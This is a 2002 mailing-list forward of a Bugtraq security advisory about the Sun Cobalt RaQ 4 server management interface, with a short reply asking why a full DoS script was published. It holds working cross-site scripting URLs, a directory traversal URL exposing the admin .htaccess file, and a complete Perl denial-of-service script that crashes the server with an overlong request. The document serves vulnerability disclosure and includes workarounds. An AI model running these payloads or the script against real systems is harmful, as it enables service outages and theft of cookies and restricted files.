Who are those guys, publishing a full dos script? Jelmer ----- Original Message ----- From: <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Friday, March 01, 2002 11:23 AM Subject: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities
> This appeared in Bugtraq yesterday: > > -------------------------------------------------------------------- > From: Alex Hernandez <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED] > Subject: Colbalt-RAQ-v4-Bugs&Vulnerabilities > Date sent: Thu, 28 Feb 2002 09:33:17 -0500 > Send reply to: <[EMAIL PROTECTED]> > > > ------oOo---------------- > Cobalt RAQ 4 Server Management, > Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. > ------oOo---------------- > > > Company Affected: www.cobalt.com & www.sun.com > Version: RAQ 4 Server Management. > Dowload: http://www.cobalt.com/products/raq/index.html > OS Affected: Linux ALL, Solaris ALL. > > > Author: > > ** Alex Hernandez <[EMAIL PROTECTED]> > ** Thanks all the people from Spain and Argentina. > ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. > > > ----=[Brief Description]=------------ > > The Sun Cobalt RaQ is a server appliance for Internet Service Providers > (ISPs). It can host up to 200 individual websites or it can be dedicated > to a single medium or large customer. This versatility opens up tremendous > opportunity for service provider to invest in a single piece of hardware > while migrating business customers up to dedicated servers. > > > ----=[Summary]=---------------------- > > > Exist three vulnerabilities: > > a) Cross Site Scripting. > b) Traversal vulnerabilities. > c) Denial Of Service.(Exploit Released) > > > Cobalt's service.cgi incorrectly handles the incoming search parses, > incoming HTML tags or JavaScript will be included inside the result > without them being filtered out for dangerous content. A similar problem > occurs with the x.cgi's inclusion of malicious code inside the resulting > title search. > > The cgi^s files is an open source .A security vulnerability in the > product allows attackers to insert malicious content into existing web > pages by exploiting the Cross-Site Scripting Vulnerability. > > > Affected Files Cgi^s > > alert.cgi > service.cgi > > > Workaround: > 1) Delete service.cgi from the system, or disable its possible > execution. > 2) Delete alert.cgi from the system, or disable its possible execution > > > EXAMPLES: > > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h > 1><script>alert('hello')</script> > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert > ('Microsoft%20hole')</script> > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=ja > vascript:alert(document.domain)> > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert > (document.cookie)</script> > > LOCATION: > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ea > lert(document.location)%3C/script%3E > > COOKIES: > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ea > lert(document.cookie)%3C/script%3E > > TAG IMAGES: > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=ja > vascript:alert(document.domain)> > > > WRITE ON DOCUMENT: > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>docum > ent.write(document.domain)</SCRIPT> > > > ------oOo-------- > > Traversal File configuration. > > > Exploit: > http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess > > # Access file for /usr/admserv/html/.cobalt/admin/ (admin ) > order allow,deny > allow from all > require user admin > Authname CobaltRaQ > Authtype Basic > > > > Directory by Default on server is: "/usr/admserv/html/.cobalt/admin" u can > translate to any directory for capture restricted files or passwords and > profiles the users. > > > ------oOo-------- > > Denial Of service. > > > Proof Of concept: > > Server crashes after sending a very long URL: > > Example: > > http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA... > (Ax100000)...AAA > > > Crash system and the admin need restart the service!. > > > ------oOo------------- > Exploit Code DoS Cobalt4_DoS.pl > ------oOo------------- > > > #!/usr/bin/perl > # > # Simple script to send a long 'A^s' command to the server, > # resulting in the server crashing. > # > # Cobalt RAQ DoS v4 proof-of-concept exploit. > # By Alex Hernandez <[EMAIL PROTECTED]> (C)2002. > # > # Thanks all the people from Spain and Argentina. > # Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. > # > # > # Usage: perl -x Cobalt4_DoS.pl -s <server> > # > # Example: > # > # perl -x Cobalt4_DoS.pl -s 10.0.0.1 > # > # Crash was successful ! > # > > use Getopt::Std; > use IO::Socket; > > print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n"); > print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); > > getopts('s:', \%args); > if(!defined($args{s})){&usage;} > > ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); > > $def = "A"; > $num = "100000"; > $data .= $def x $num; > $serv = $args{s}; > $port = 81;#maybe u define the port for diference of versions > $buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data > /HTTP/1.0\r\n\r\n"; > > > $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); > $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); > $proto = getprotobyname('tcp') || die("Error: $!\n"); > > socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); > connect(S, $paddr) ||die ("Error: $!"); > select(S); $| = 1; select(STDOUT); > print S "$buf"; > > > print("\nCrash was successful !\n\n"); > > sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} > > > > ------oOo------------------------------------ > Vendor Response: > The vendor was notified > > Posted List^s Security cobalt: > [EMAIL PROTECTED] & > [EMAIL PROTECTED] > > http://www.cobalt.com > Patch Temporary: > Delete files cgi^s from the system, or disable its > possible execution. > > Alex Hernandez <[EMAIL PROTECTED]> (c) 2002. > > ------oOo------------------------------------ > > > > > _______________________________________________ > cobalt-security mailing list > [EMAIL PROTECTED] > http://list.cobalt.com/mailman/listinfo/cobalt-security > _______________________________________________ cobalt-security mailing list [EMAIL PROTECTED] http://list.cobalt.com/mailman/listinfo/cobalt-security
